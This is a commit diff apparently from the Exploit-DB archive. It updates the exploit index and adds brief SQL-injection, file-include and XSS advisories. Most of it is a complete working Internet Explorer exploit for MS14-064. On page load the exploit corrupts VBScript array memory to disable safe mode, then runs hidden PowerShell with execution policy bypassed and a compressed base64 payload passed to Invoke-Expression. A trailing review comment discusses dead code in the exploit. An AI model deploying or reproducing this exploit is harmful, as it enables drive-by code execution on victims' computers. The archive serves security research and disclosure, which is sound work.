Updated 11_22_2014
This commit is contained in:
parent
bf592f7589
commit
ba4b116f27
6 changed files with 277 additions and 1 deletions
|
@ -31731,7 +31731,7 @@ id,file,description,date,author,platform,type,port
|
|||
35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0
|
||||
35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
|
||||
35229,platforms/windows/remote/35229.html,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
|
||||
35229,platforms/windows/remote/35229.html,"Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1)",2014-11-13,yuange,windows,remote,0
|
||||
35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0
|
||||
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
|
||||
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
|
||||
|
@ -31800,3 +31800,8 @@ id,file,description,date,author,platform,type,port
|
|||
35305,platforms/php/webapps/35305.txt,"ACollab 't' Parameter SQL Injection Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
|
||||
35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 'user_password' Parameter Cross Site Scripting Vulnerability",2011-02-02,"AutoSec Tools",php,webapps,0
|
||||
35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 'cp_menu_data_file.php' SQL Injection Vulnerability",2011-01-31,"AutoSec Tools",php,webapps,0
|
||||
35308,platforms/windows/remote/35308.html,"Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0
|
||||
35309,platforms/php/webapps/35309.txt,"Betsy 4.0 'page' Parameter Local File Include Vulnerability",2011-02-02,MizoZ,php,webapps,0
|
||||
35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0
|
||||
35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
|
||||
35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0
|
||||
|
|
|
8
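--- a/platforms/asp/webapps/35310.txt
+++ b/platforms/asp/webapps/35310.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/46131/info
+
+Web Wiz Forums is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/default.asp?pid=[SQLi]
+http://www.example.com/viewproduct.asp?PID=[SQli]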
9
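--- a/platforms/php/webapps/35309.txt
+++ b/platforms/php/webapps/35309.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46124/info
+
+Betsy is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+Betsy 4.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ress.php?page=[LFI]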
17
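--- a/platforms/php/webapps/35311.txt
+++ b/platforms/php/webapps/35311.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/46135/info
+
+Octeth Oempro is prone to multiple SQL-injection vulnerabilities and an information-disclosure vulnerability.
+
+Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Octeth Oempro 3.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cli_bounce.php
+
+http://www.example.com/link.php?URL=[ENC URL]&Name=&EncryptedMemberID=[ENCODED
+SQLI]&CampaignID=9&CampaignStatisticsID=16&Demo=0&Email=[MAIL]
+
+http://www.example.com/html_version.php?ECID=[SQL]
+
+http://www.example.com/archive.php?ArchiveID=[SQL]
+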
7
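--- a/platforms/php/webapps/35312.txt
+++ b/platforms/php/webapps/35312.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46143/info
+
+Firebook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials.
+
+http://www.example.com/env/index.html?[xss]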
230
platforms/windows/remote/35308.html
Executable file
230
platforms/windows/remote/35308.html
Executable file
|
@ -0,0 +1,230 @@
|
|||
<!doctype html>
|
||||
<html>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|
||||
<body>
|
||||
|
||||
<pre>
|
||||
|--------------------------------------------------------------------------|
|
||||
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |
|
||||
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
|
||||
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) |
|
||||
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
|
||||
| Usage: http://www.fuzzysecurity.com/exploits/21.html |
|
||||
|--------------------------------------------------------------------------|
|
||||
Very nice black-magic yuange, don't think it went unnoticed that you
|
||||
have been popping shells since 2009 :D ???????????
|
||||
|--------------------------------------------------------------------------|
|
||||
</pre>
|
||||
|
||||
<SCRIPT LANGUAGE="VBScript">
|
||||
function runmumaa()
|
||||
On Error Resume Next
|
||||
set shell=createobject("Shell.Application")
|
||||
|
||||
'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
|
||||
payload="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"
|
||||
|
||||
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
|
||||
|
||||
params="-NoP -NonI -Exec Bypass -Command " & command
|
||||
|
||||
'Original POC yuange
|
||||
'set shell=createobject("Shell.Application")
|
||||
'shell.ShellExecute "notepad.exe"
|
||||
|
||||
'With UAC
|
||||
'shell.ShellExecute "powershell", params, "", "runas", 0
|
||||
|
||||
'Without UAC
|
||||
shell.ShellExecute "powershell", params, "", "", 0
|
||||
|
||||
end function
|
||||
</script>
|
||||
|
||||
<SCRIPT LANGUAGE="VBScript">
|
||||
|
||||
dim aa()
|
||||
dim ab()
|
||||
dim a0
|
||||
dim a1
|
||||
dim a2
|
||||
dim a3
|
||||
dim win9x
|
||||
dim intVersion
|
||||
dim rnda
|
||||
dim funclass
|
||||
dim myarray
|
||||
|
||||
Begin()
|
||||
|
||||
function Begin()
|
||||
On Error Resume Next
|
||||
info=Navigator.UserAgent
|
||||
|
||||
if(instr(info,"Win64")>0) then
|
||||
exit function
|
||||
end if
|
||||
|
||||
if (instr(info,"MSIE")>0) then
|
||||
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
|
||||
else
|
||||
exit function
|
||||
|
||||
end if
|
||||
|
||||
win9x=0
|
||||
|
||||
BeginInit()
|
||||
If Create()=True Then
|
||||
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
|
||||
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
|
||||
|
||||
if(intVersion<4) then
|
||||
document.write("<br> IE")
|
||||
document.write(intVersion)
|
||||
runshellcode()
|
||||
else
|
||||
setnotsafemode()
|
||||
end if
|
||||
end if
|
||||
end function
|
||||
|
||||
function BeginInit()
|
||||
Randomize()
|
||||
redim aa(5)
|
||||
redim ab(5)
|
||||
a0=13+17*rnd(6)
|
||||
a3=7+3*rnd(5)
|
||||
end function
|
||||
|
||||
function Create()
|
||||
On Error Resume Next
|
||||
dim i
|
||||
Create=False
|
||||
For i = 0 To 400
|
||||
If Over()=True Then
|
||||
' document.write(i)
|
||||
Create=True
|
||||
Exit For
|
||||
End If
|
||||
Next
|
||||
end function
|
||||
|
||||
sub testaa()
|
||||
end sub
|
||||
|
||||
function mydata()
|
||||
On Error Resume Next
|
||||
i=testaa
|
||||
i=null
|
||||
redim Preserve aa(a2)
|
||||
|
||||
ab(0)=0
|
||||
aa(a1)=i
|
||||
ab(0)=6.36598737437801E-314
|
||||
|
||||
aa(a1+2)=myarray
|
||||
ab(2)=1.74088534731324E-310
|
||||
mydata=aa(a1)
|
||||
redim Preserve aa(a0)
|
||||
end function
|
||||
|
||||
|
||||
function setnotsafemode()
|
||||
On Error Resume Next
|
||||
i=mydata()
|
||||
i=readmemo(i+8)
|
||||
i=readmemo(i+16)
|
||||
j=readmemo(i+&h134)
|
||||
for k=0 to &h60 step 4
|
||||
j=readmemo(i+&h120+k)
|
||||
if(j=14) then
|
||||
j=0
|
||||
redim Preserve aa(a2)
|
||||
aa(a1+2)(i+&h11c+k)=ab(4)
|
||||
redim Preserve aa(a0)
|
||||
|
||||
j=0
|
||||
j=readmemo(i+&h120+k)
|
||||
|
||||
Exit for
|
||||
end if
|
||||
|
||||
next
|
||||
ab(2)=1.69759663316747E-313
|
||||
runmumaa()
|
||||
end function
|
||||
|
||||
function Over()
|
||||
On Error Resume Next
|
||||
dim type1,type2,type3
|
||||
Over=False
|
||||
a0=a0+a3
|
||||
a1=a0+2
|
||||
a2=a0+&h8000000
|
||||
|
||||
redim Preserve aa(a0)
|
||||
redim ab(a0)
|
||||
|
||||
redim Preserve aa(a2)
|
||||
|
||||
type1=1
|
||||
ab(0)=1.123456789012345678901234567890
|
||||
aa(a0)=10
|
||||
|
||||
If(IsObject(aa(a1-1)) = False) Then
|
||||
if(intVersion<4) then
|
||||
mem=cint(a0+1)*16
|
||||
j=vartype(aa(a1-1))
|
||||
if((j=mem+4) or (j*8=mem+8)) then
|
||||
if(vartype(aa(a1-1))<>0) Then
|
||||
If(IsObject(aa(a1)) = False ) Then
|
||||
type1=VarType(aa(a1))
|
||||
end if
|
||||
end if
|
||||
else
|
||||
redim Preserve aa(a0)
|
||||
exit function
|
||||
|
||||
end if
|
||||
else
|
||||
if(vartype(aa(a1-1))<>0) Then
|
||||
If(IsObject(aa(a1)) = False ) Then
|
||||
type1=VarType(aa(a1))
|
||||
end if
|
||||
end if
|
||||
end if
|
||||
end if
|
||||
|
||||
|
||||
If(type1=&h2f66) Then
|
||||
Over=True
|
||||
End If
|
||||
If(type1=&hB9AD) Then
|
||||
Over=True
|
||||
win9x=1
|
||||
End If
|
||||
|
||||
redim Preserve aa(a0)
|
||||
|
||||
end function
|
||||
|
||||
function ReadMemo(add)
|
||||
On Error Resume Next
|
||||
redim Preserve aa(a2)
|
||||
|
||||
ab(0)=0
|
||||
aa(a1)=add+4
|
||||
ab(0)=1.69759663316747E-313
|
||||
ReadMemo=lenb(aa(a1))
|
||||
|
||||
ab(0)=0
|
||||
|
||||
redim Preserve aa(a0)
|
||||
end function
|
||||
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
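Review bot: The `if(intVersion<4)` branch inside `Begin()` calls `runshellcode()`, which is not defined anywhere in this file, so under `On Error Resume Next` that call would fail silently; the `intVersion` parsed from the `MSIE` token is never below 4 in practice, so the branch looks like dead code carried over from the original 35229 PoC and should either be removed or carry a comment such as `' leftover from yuange's PoC: runshellcode() is not provided here`. The same applies to `win9x`, which is set in `Over()` but never read. The header comment could also state what the version gate admits: the `MSIE` substring check makes the script exit on anything whose User-Agent lacks that token, presumably why the title says "Pre IE11", but that is inferred rather than stated in the file.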